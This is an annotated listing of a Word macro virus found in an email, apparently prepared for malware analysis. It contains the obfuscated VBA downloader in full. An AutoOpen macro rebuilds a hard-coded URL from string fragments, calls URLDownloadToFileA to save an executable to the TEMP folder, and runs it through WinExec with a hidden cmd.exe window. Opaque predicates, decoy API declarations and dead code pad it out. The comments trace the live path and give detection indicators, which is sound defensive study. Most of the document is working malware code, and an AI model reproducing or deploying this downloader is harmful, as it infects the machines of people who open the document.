Word macro virus in received email
' Simplified rendering of the obfuscated AutoOpen macro listed further down:
' every constant-valued test has been collapsed to True/False, leaving only
' the branch that actually executes.
' AutoOpen is Word's auto-run macro name, so this body runs when the document
' is opened with macros enabled.
' Behaviour: download a file from a hard-coded URL into the TEMP directory and,
' if the download call reports success, launch it through cmd.exe.
' Indicators visible in this listing (defanged here, code left untouched):
'   URL  : hxxp://truthtrustrehl[.]wang/search[.]php
'   File : wkyfo.exe under the directory named by the TEMP environment variable
' NOTE(review): this is shorthand, not a faithful copy of the original.
' "urlmon" and "WinExec" stand in for the Declare'd API aliases, and the
' obfuscated original assembles the file name as "\wkyfo.exe" (with a leading
' backslash), which this rendering drops.
Sub AutoOpen()
If (True) Then
If (True) Then
If (False) Then
Else
If (False) Then
Else
Select Case Empty
Case Empty
tyqegexl = False
Select Case False
Case False
Select Case 968
Case 968
If (False) Then
Else
If (True) Then
Select Case "ynbolq"
Case "ynbolq"
Select Case False
Case False
If (True) Then
If (True) Then
If (True) Then
Select Case "xepuvc"
Case "xepuvc"
If (True) Then
' Drop location: TEMP directory plus a fixed executable name.
exe_location = Environ("temp") & "wkyfo.exe"
' Stage 1: fetch the remote content to disk. A return value of 0 is treated as success.
response_code = urlmon(0, "http://truthtrustrehl.wang/search.php", exe_location, 0, 0)
If response_code = 0 Then
' Stage 2: run the dropped file via cmd.exe /c. The second argument 0 is the
' show-window value for a hidden window.
' Detection angle: an Office process writing an .exe to TEMP and then spawning cmd.exe.
WinExec "cmd.exe /c " & exe_location, 0
End If
End If
End Select
End If
End If
End If
End Select
End Select
End If
End If
End Select
End Select
End Select
End If
End If
End If
End If
End Sub
' Win32 API imports for the obfuscated macro.
' Only two of these are called in this listing: khyzpym (kernel32 WinExec) and
' URLDownloadToFileA (urlmon). The other three are never called here; their
' random names and implausible parameter lists suggest padding meant to bury
' the two real imports -- NOTE(review): presumably not real DLL exports, confirm.
' Defensive relevance: Declare statements that pull URLDownloadToFile* and
' WinExec into an Office macro are a strong static indicator on their own, and
' are the behaviour targeted by the Defender ASR rule "Block Win32 API calls
' from Office macros".

' Unused in this listing (decoy).
Private Declare PtrSafe Function adpows Lib "advapi32" (ByVal qqanle As Long, ByVal ytyqe As Byte, ByVal jmigejhi As Single, ByVal mxungozna As Variant, ByVal pucfymo As Object, ByVal oqdawtaj As Long, ByVal spudi As String, ByVal mzesi As Single, ByVal pnonukv As Long, ByVal zoji As Integer, ByVal ygzopbop As Integer, ByVal ppycede As Boolean) As Double
' Real import: kernel32!WinExec hidden behind the alias name khyzpym.
Private Declare PtrSafe Function khyzpym Lib "kernel32" Alias "WinExec" (ByVal apcasup As String, ByVal bihihe As Long) As Long
' Unused in this listing (decoy).
Private Declare PtrSafe Function ynikix Lib "advapi32" Alias "cujo" (ByVal edimw As Variant, ByVal anloj As Boolean, ByVal teggo As String, ByVal kete As Byte, ByVal amzipwe As String, ByVal zfila As Integer, ByVal bgymritj As Double, ByVal jutymy As Currency, ByVal ajryrcup As Object, ByVal eqyvehc As Integer, ByVal jikibgo As Long, ByVal avzef As Object, ByVal uwymuwb As String, ByVal ulydh As Double)
' Real import: urlmon!URLDownloadToFileA, declared under its own name (not aliased).
Private Declare PtrSafe Function URLDownloadToFileA Lib "urlmon" (ByVal adykr As Long, ByVal eghofj As String, ByVal nroptemma As String, ByVal mofwam As Long, ByVal gyby As Long) As Long
' Unused in this listing (decoy).
Private Declare PtrSafe Function ikgyxfipx Lib "kernel32" (ByVal bzokomxu As Long, ByVal lpelwo As Single, ByVal ezuno As Object, ByVal awwirbu As Boolean, ByVal ywilawg As Double, ByVal lpytbuxdi As String, ByVal ynyl As Object, ByVal gubow As Currency, ByVal tvusukxa As Boolean)
' String-splitting layer: each function returns a fragment of at most four
' characters. The complete environment-variable name, file name, URL and
' command prefix never appear as a single literal in the macro, which defeats
' naive string/signature matching. The fragments are joined by ycmapenbi,
' ogonp, odqyhbyxk and ndaryw.
' Analysis tip: concatenating the return values in call order recovers the
' plaintext without running the macro.

' --- fragments of the environment-variable name: "tem" + "p" ---
Function adytpo()
adytpo = "tem"
End Function
Function ighirpynm()
ighirpynm = "p"
End Function
' --- fragments of the dropped file name: "\w" + "ky" + "fo" + ".e" + "xe" ---
Function enizen()
enizen = "\w"
End Function
Function qevfo()
qevfo = "ky"
End Function
Function lgysyvoc()
lgysyvoc = "fo"
End Function
Function hzunypon()
hzunypon = ".e"
End Function
Function jetlufs()
jetlufs = "xe"
End Function
' --- fragments of the download URL (scheme, host, path), ten pieces ---
Function iryfiju()
iryfiju = "http"
End Function
Function oxhymwa()
oxhymwa = "://t"
End Function
Function sojzo()
sojzo = "ruth"
End Function
Function ujese()
ujese = "trus"
End Function
Function ozjufecj()
ozjufecj = "treh"
End Function
Function ophyzhykhy()
ophyzhykhy = "l.wa"
End Function
Function hiclesla()
hiclesla = "ng/s"
End Function
Function imycgu()
imycgu = "earc"
End Function
Function axlycvah()
axlycvah = "h.ph"
End Function
Function ufigx()
ufigx = "p"
End Function
' --- fragments of the command prefix: "cmd." + "exe " + "/c " ---
Function otvypeby()
otvypeby = "cmd."
End Function
Function ffojgomo()
ffojgomo = "exe "
End Function
Function ockyjr()
ockyjr = "/c "
End Function
' Constant-returning helpers used as opaque predicates. Each returns a fixed
' value (number, Boolean, string or Empty); AutoOpen compares those values in
' If / Select Case tests whose outcome is therefore decided before the macro
' runs. They add no behaviour of their own.
' The ones on the executing path of AutoOpen are lkolsel (8), uxmabuca (12),
' ucofx (Empty), exjakolnyf (Empty), qifboz (968), usewvicifv (False),
' orapifipw ("72800") and cofyveli ("18588"). Several others (for example
' qcudekom, acvoj, udzitedw, nebuheko, bbesin) are not referenced anywhere in
' this listing.
' No declarations are visible for the inner temporaries (epullowbupl, gefvaw,
' ...), so they are implicitly typed locals.
Function qcudekom()
qcudekom = "rogehf"
End Function
Function acvoj()
epullowbupl = False
acvoj = epullowbupl
End Function
' Returns 8; AutoOpen tests TypeName(lkolsel) = "Integer" as its first gate.
Function lkolsel()
lkolsel = 8
End Function
Function udzitedw()
udzitedw = True
End Function
' Returns 12; second TypeName(...) = "Integer" gate in AutoOpen.
Function uxmabuca()
gefvaw = 12
uxmabuca = gefvaw
End Function
Function iwyhyvv()
itefjan = 854
iwyhyvv = itefjan
End Function
Function hucwelvigwo()
rafus = True
hucwelvigwo = rafus
End Function
' Returns Empty; AutoOpen compares it with 518, which never matches.
Function ucofx()
ucofx = Empty
End Function
Function ozohacfeg()
ollymikz = False
ozohacfeg = ollymikz
End Function
Function agdygbojb()
agdygbojb = Empty
End Function
' Returns Empty; selects the "Case Empty" arm of AutoOpen's outer Select Case.
Function exjakolnyf()
copenlosm = Empty
exjakolnyf = copenlosm
End Function
Function izfawyfj()
izfawyfj = "53168"
End Function
Function mqoxebew()
mqoxebew = "yvgowmuwe"
End Function
Function posxuvegk()
posxuvegk = 41
End Function
Function hepnyc()
sowjylxor = False
hepnyc = sowjylxor
End Function
' Returns 968; selects the "Case 968" arm in AutoOpen.
Function qifboz()
qifboz = 968
End Function
Function nebuheko()
iwrijlabyzx = False
nebuheko = iwrijlabyzx
End Function
' Returns False; AutoOpen's test "usewvicifv = False" is therefore always True.
Function usewvicifv()
usewvicifv = False
End Function
Function pidbeng()
pidbeng = False
End Function
Function izfij()
izfij = Empty
End Function
Function ablevesowl()
uduroqsur = "svys"
ablevesowl = uduroqsur
End Function
Function mgojzyt()
nevvyz = "elefnaxhew"
mgojzyt = nevvyz
End Function
' Returns "72800"; matches the literal AutoOpen compares it against.
Function orapifipw()
qujtomvesa = "72800"
orapifipw = qujtomvesa
End Function
Function efmexxohkev()
ynasi = False
efmexxohkev = ynasi
End Function
Function ywomvugysp()
ksycozn = Empty
ywomvugysp = ksycozn
End Function
Function bbesin()
bbesin = "nirf"
End Function
' Returns "18588"; this is the last gate directly in front of the download call.
Function cofyveli()
encygarer = "18588"
cofyveli = encygarer
End Function
' Assemblers: join the string fragments back into the four values the payload
' needs. Resolved statically from the fragment functions in this listing.

' Environment-variable name: "tem" & "p" -> "temp".
Function ycmapenbi()
ycmapenbi = adytpo() & ighirpynm()
End Function
' Dropped file name, including the leading path separator: "\wkyfo.exe".
Function ogonp()
ogonp = enizen() & qevfo() & lgysyvoc() & hzunypon() & jetlufs()
End Function
' Download URL (defanged here): hxxp://truthtrustrehl[.]wang/search[.]php
Function odqyhbyxk()
odqyhbyxk = iryfiju() & oxhymwa() & sojzo() & ujese() & ozjufecj() & ophyzhykhy() & hiclesla() & imycgu() & axlycvah() & ufigx()
End Function
' Command prefix: "cmd.exe /c " (trailing space included).
Function ndaryw()
ndaryw = otvypeby() & ffojgomo() & ockyjr()
End Function
' Obfuscated entry point as received. AutoOpen is Word's auto-run macro name,
' so this executes when the document is opened with macros enabled.
' Almost everything below is filler: assignments to variables that are never
' read, and If / Select Case tests on constants or on helper functions that
' return constants. Exactly one path reaches real behaviour, the
' Case "xepuvc" arm, which:
'   1. builds a path from Environ("temp") plus "\wkyfo.exe",
'   2. calls URLDownloadToFileA to save the response from
'      hxxp://truthtrustrehl[.]wang/search[.]php (defanged) to that path,
'   3. if the call returns 0, runs "cmd.exe /c <path>" through the WinExec alias
'      with show-window value 0 (hidden).
' Comments marked LIVE PATH trace that route; unmarked branches do not execute
' or have no effect.
' Defensive notes: the dead code changes the macro's bytes but not its
' behaviour, so detection is more reliable on the behaviour than on the text:
' Declare'd URLDownloadToFile/WinExec in a document macro, an Office process
' writing an executable under TEMP, and an Office process spawning cmd.exe
' (the ASR rule "Block all Office applications from creating child processes"
' addresses the last of these).
Sub AutoOpen()
' Filler: none of these ten values influences the executing path except that
' quxwuradd/gomqi/uhkypuztatx appear in tests on branches that are never taken.
lserexuzd = Empty
quxwuradd = Empty
lhujpabehha = "veppywk"
emivcodw = 75
iqytli = False
nofinok = True
avxevrobke = "70213"
orjora = "70945"
gomqi = Empty
uhkypuztatx = 11
' LIVE PATH: lkolsel returns 8 and uxmabuca returns 12, so both TypeName tests are True.
If (TypeName(lkolsel) = "Integer") Then
If (TypeName(uxmabuca) = "Integer") Then
pysetu = Empty
' LIVE PATH: Empty never equals "ulokni", so execution goes to the Else arm.
If (pysetu = "ulokni") Then
eddehe = "inmontyjjacj"
If (eddehe = Null) Then
dihquxkufe = "85817"
ltejufijy = "22007"
ewuhodcort = "32559"
End If
Else
' LIVE PATH: ucofx returns Empty, which does not equal 518, so the Else arm below runs.
If (ucofx = 518) Then
If (TypeName(iwyhyvv) = "Integer") Then
pqikidepd = "97126"
nilvecejte = 296
petubt = pqikidepd & nilvecejte
petubt = " & petubt"
atuto = Empty
ysobi = "odjuratsif"
lsoxug = False
limtajinz = "80354"
zkutwero = 12
jgipfegipb = limtajinz & zkutwero
jgipfegipb = "58432" & jgipfegipb
End If
kiznaji = 85
If (kiznaji = 107) Then
If (hucwelvigwo = 504) Then
ribuzsubz = "ozcyje"
jlopguwb = 656
kduhujuf = 15
uhtakuze = 97
hzebudi = True
hzetnowji = Empty
End If
End If
Else
' LIVE PATH: exjakolnyf returns Empty, selecting "Case Empty" further down.
Select Case exjakolnyf
Case "obmeklu"
If (ozohacfeg = False) Then
If (agdygbojb = 785) Then
udolejna = "48583"
atukcytkahs = 15
bjypkur = atukcytkahs & udolejna
bjypkur = bjypkur & "41708"
End If
End If
If (TypeName(gomqi) = "Empty") Then
xnehinpoxu = ""
xnehinpoxu = " & xnehinpoxu"
End If
' LIVE PATH: matching arm of the outer Select Case.
Case Empty
tyqegexl = False
' LIVE PATH: tyqegexl is False, so "Case False" below is the arm that runs.
Select Case tyqegexl
Case 97
If (izfawyfj = undefined) Then
etolnij = "42524"
olyminy = 82
didzacyt = etolnij & olyminy
didzacyt = didzacyt & ""
oxvavez = "68357"
gubfunyko = 155
End If
aryh = Empty
If (aryh = Empty) Then
If (mqoxebew = "gik") Then
lrylufqa = False
nuzic = "xbolal"
End If
End If
enxikavb = 933
If (enxikavb < 1075) Then
rratxowdy = "avyjruhukx"
bhoqtif = 7
muflipfo = rratxowdy & bhoqtif
muflipfo = " & muflipfo"
tsilovn = "afexup"
tsilovn = ""
aruvycy = "49647"
xoxwuru = 13
evemja = aruvycy & xoxwuru
lvuhatamy = "xajruqwo"
lvuhatamy = "ncomoflisz" & lvuhatamy
cyksone = Empty
yrodjutr = 15
End If
If (posxuvegk > 13) Then
ksujeq = ""
oqmakukfoz = "umipra"
wwilamv = 935
ylmezejasg = wwilamv & oqmakukfoz
ylmezejasg = "33855" & ylmezejasg
wtabog = "uvmikawh"
ylnabiller = 833
egsonunes = ylnabiller & wtabog
egsonunes = egsonunes & ""
End If
' LIVE PATH: matching arm for tyqegexl = False.
Case False
' LIVE PATH: qifboz returns 968, selecting "Case 968".
Select Case qifboz
Case True
If (quxwuradd = "hzoqbohha") Then
If (hepnyc = False) Then
End If
End If
ajec = "61096"
If (ajec = Null) Then
acehket = False
mesefowi = False
End If
' LIVE PATH: matching arm for qifboz.
Case 968
axjazu = 34
' LIVE PATH: 34 is not 57, so the Then arm is skipped and the Else arm runs.
If (axjazu = 57) Then
ewsiroh = True
If (ewsiroh = 981) Then
ihcazets = "86770"
lajozyko = 130
mobatw = "68123"
naflovy = 11
mulpaqosqu = naflovy & mobatw
mulpaqosqu = mulpaqosqu & "itaqc"
gawwamyjf = 97
End If
uqvydebx = 83
If (TypeName(uqvydebx) = "Integer") Then
qrofliqjize = "hylnuxa"
eruzore = 595
yxqipqyfpev = qrofliqjize & eruzore
yxqipqyfpev = yxqipqyfpev & ""
ohfitcu = "87488"
lkahema = ""
lkahema = " & lkahema"
vcemawd = False
dolopjo = "ody"
dolopjo = "70369"
ipicdibo = "qezkozgef"
ipicdibo = "bqacoz" & ipicdibo
gfukaphobjy = False
End If
samorhucu = False
If (samorhucu = False) Then
bvuszugd = 148
afrekymod = "pynqejje"
mqewyfac = 921
ypnevirta = mqewyfac & afrekymod
ypnevirta = ypnevirta & ""
utexynj = "dopmozuv"
yjzehu = True
aqimevti = "62970"
End If
Else
' LIVE PATH: these six assignments execute but their results are never read.
jatjirqo = "51037"
gzyxefj = 62
rzapoq = gzyxefj & jatjirqo
vgivotelo = "ewjahduzz"
okkyfod = 225
glihomiw = okkyfod & vgivotelo
' LIVE PATH: usewvicifv returns False, so this test is True.
If (usewvicifv = False) Then
ahif = "ynbolq"
' LIVE PATH: ahif was just set to "ynbolq"; the arm with that literal is the one that matters.
Select Case ahif
Case 694
lidvis = True
If (lidvis = True) Then
hyfotsu = False
If (hyfotsu = False) Then
wkolbof = True
mowylkej = "89825"
ygufzukz = "61673"
End If
End If
If (TypeName(pidbeng) = "Boolean") Then
bassyrydx = "get"
vyneteso = 305
epfyxo = vyneteso & bassyrydx
epfyxo = "540" & epfyxo
yjsevil = "2667"
ovtowowny = 227
amkebogyq = ovtowowny & yjsevil
amkebogyq = "kuzpi" & amkebogyq
fufvehikd = "92250"
fufvehikd = ""
vacbinnyja = "usruq"
bosetzeflo = 97
izmykijne = bosetzeflo & vacbinnyja
izmykijne = izmykijne & "awbagmexpubp"
ohputhagqir = "pasze"
End If
If (izfij = 899) Then
qmyzoni = 13
End If
' LIVE PATH: matching arm for ahif.
Case "ynbolq"
obnekz = False
' LIVE PATH: obnekz is False; the "Case False" arm below leads to the payload.
Select Case obnekz
Case "43356"
lvigmihf = 735
If (lvigmihf = 908) Then
fbenlasydve = True
If (fbenlasydve = False) Then
If (uhkypuztatx = 7) Then
culpajy = 200
amude = 752
bybat = 47
olotpo = ""
yzoppu = ""
yzoppu = " & yzoppu"
End If
End If
End If
' LIVE PATH: matching arm for obnekz.
Case False
izlefx = 216
' LIVE PATH: the next three tests compare values with themselves or with the
' constants their helper returns (orapifipw -> "72800"), so all are True.
If (izlefx = 216) Then
If (orapifipw = "72800") Then
ylforpopb = False
If (ylforpopb = False) Then
aklaxoje = "xepuvc"
' LIVE PATH: aklaxoje was just set to "xepuvc"; only that arm does anything.
' The Null / Empty / 95 arms are identical filler copies of each other.
Select Case aklaxoje
Case Null
If (ywomvugysp = 330) Then
dpygukce = True
alappimki = "snyk"
End If
Case Empty
If (ywomvugysp = 330) Then
dpygukce = True
alappimki = "snyk"
End If
' LIVE PATH: payload arm.
Case "xepuvc"
' cofyveli returns "18588", so this final gate is always open.
If (cofyveli = "18588") Then
' Drop path: Environ("temp") followed by "\wkyfo.exe".
ampywno = Environ(ycmapenbi()) & ogonp()
' Download stage: URLDownloadToFileA(0, <URL>, <drop path>, 0, 0); 0 means success.
nvyvykc = URLDownloadToFileA(0, odqyhbyxk(), ampywno, 0, 0)
If nvyvykc = 0 Then
' Execution stage: khyzpym is the alias for kernel32 WinExec. The command line is
' "cmd.exe /c " plus the drop path; the second argument 0 requests a hidden window.
khyzpym ndaryw() & ampywno, 0
End If
End If
Case 95
If (ywomvugysp = 330) Then
dpygukce = True
alappimki = "snyk"
End If
End Select
End If
End If
End If
End Select
' The Null, Empty and 279 arms below repeat the "Case 694" filler body verbatim.
Case Null
lidvis = True
If (lidvis = True) Then
hyfotsu = False
If (hyfotsu = False) Then
wkolbof = True
mowylkej = "89825"
ygufzukz = "61673"
End If
End If
If (TypeName(pidbeng) = "Boolean") Then
bassyrydx = "get"
vyneteso = 305
epfyxo = vyneteso & bassyrydx
epfyxo = "540" & epfyxo
yjsevil = "2667"
ovtowowny = 227
amkebogyq = ovtowowny & yjsevil
amkebogyq = "kuzpi" & amkebogyq
fufvehikd = "92250"
fufvehikd = ""
vacbinnyja = "usruq"
bosetzeflo = 97
izmykijne = bosetzeflo & vacbinnyja
izmykijne = izmykijne & "awbagmexpubp"
ohputhagqir = "pasze"
End If
If (izfij = 899) Then
qmyzoni = 13
End If
Case Empty
lidvis = True
If (lidvis = True) Then
hyfotsu = False
If (hyfotsu = False) Then
wkolbof = True
mowylkej = "89825"
ygufzukz = "61673"
End If
End If
If (TypeName(pidbeng) = "Boolean") Then
bassyrydx = "get"
vyneteso = 305
epfyxo = vyneteso & bassyrydx
epfyxo = "540" & epfyxo
yjsevil = "2667"
ovtowowny = 227
amkebogyq = ovtowowny & yjsevil
amkebogyq = "kuzpi" & amkebogyq
fufvehikd = "92250"
fufvehikd = ""
vacbinnyja = "usruq"
bosetzeflo = 97
izmykijne = bosetzeflo & vacbinnyja
izmykijne = izmykijne & "awbagmexpubp"
ohputhagqir = "pasze"
End If
If (izfij = 899) Then
qmyzoni = 13
End If
Case 279
lidvis = True
If (lidvis = True) Then
hyfotsu = False
If (hyfotsu = False) Then
wkolbof = True
mowylkej = "89825"
ygufzukz = "61673"
End If
End If
If (TypeName(pidbeng) = "Boolean") Then
bassyrydx = "get"
vyneteso = 305
epfyxo = vyneteso & bassyrydx
epfyxo = "540" & epfyxo
yjsevil = "2667"
ovtowowny = 227
amkebogyq = ovtowowny & yjsevil
amkebogyq = "kuzpi" & amkebogyq
fufvehikd = "92250"
fufvehikd = ""
vacbinnyja = "usruq"
bosetzeflo = 97
izmykijne = bosetzeflo & vacbinnyja
izmykijne = izmykijne & "awbagmexpubp"
ohputhagqir = "pasze"
End If
If (izfij = 899) Then
qmyzoni = 13
End If
End Select
End If
End If
' The "95963" and Null arms repeat the "Case True" filler body verbatim.
Case "95963"
If (quxwuradd = "hzoqbohha") Then
If (hepnyc = False) Then
End If
End If
ajec = "61096"
If (ajec = Null) Then
acehket = False
mesefowi = False
End If
Case Null
If (quxwuradd = "hzoqbohha") Then
If (hepnyc = False) Then
End If
End If
ajec = "61096"
If (ajec = Null) Then
acehket = False
mesefowi = False
End If
End Select
' Executes after the payload arm returns, but only assigns values that are never read.
dhydjihe = 60
ywage = ""
ywage = "frova"
sinrakk = 356
kpywypmaxu = "55510"
guqdorwib = 13
pmojlowr = kpywypmaxu & guqdorwib
pmojlowr = pmojlowr & "ujhefofuv"
End Select
' The "ewlewuqhu" and 42 arms repeat the "obmeklu" filler body verbatim.
Case "ewlewuqhu"
If (ozohacfeg = False) Then
If (agdygbojb = 785) Then
udolejna = "48583"
atukcytkahs = 15
bjypkur = atukcytkahs & udolejna
bjypkur = bjypkur & "41708"
End If
End If
If (TypeName(gomqi) = "Empty") Then
xnehinpoxu = ""
xnehinpoxu = " & xnehinpoxu"
End If
Case 42
If (ozohacfeg = False) Then
If (agdygbojb = 785) Then
udolejna = "48583"
atukcytkahs = 15
bjypkur = atukcytkahs & udolejna
bjypkur = bjypkur & "41708"
End If
End If
If (TypeName(gomqi) = "Empty") Then
xnehinpoxu = ""
xnehinpoxu = " & xnehinpoxu"
End If
End Select
End If
End If
End If
End If
End Sub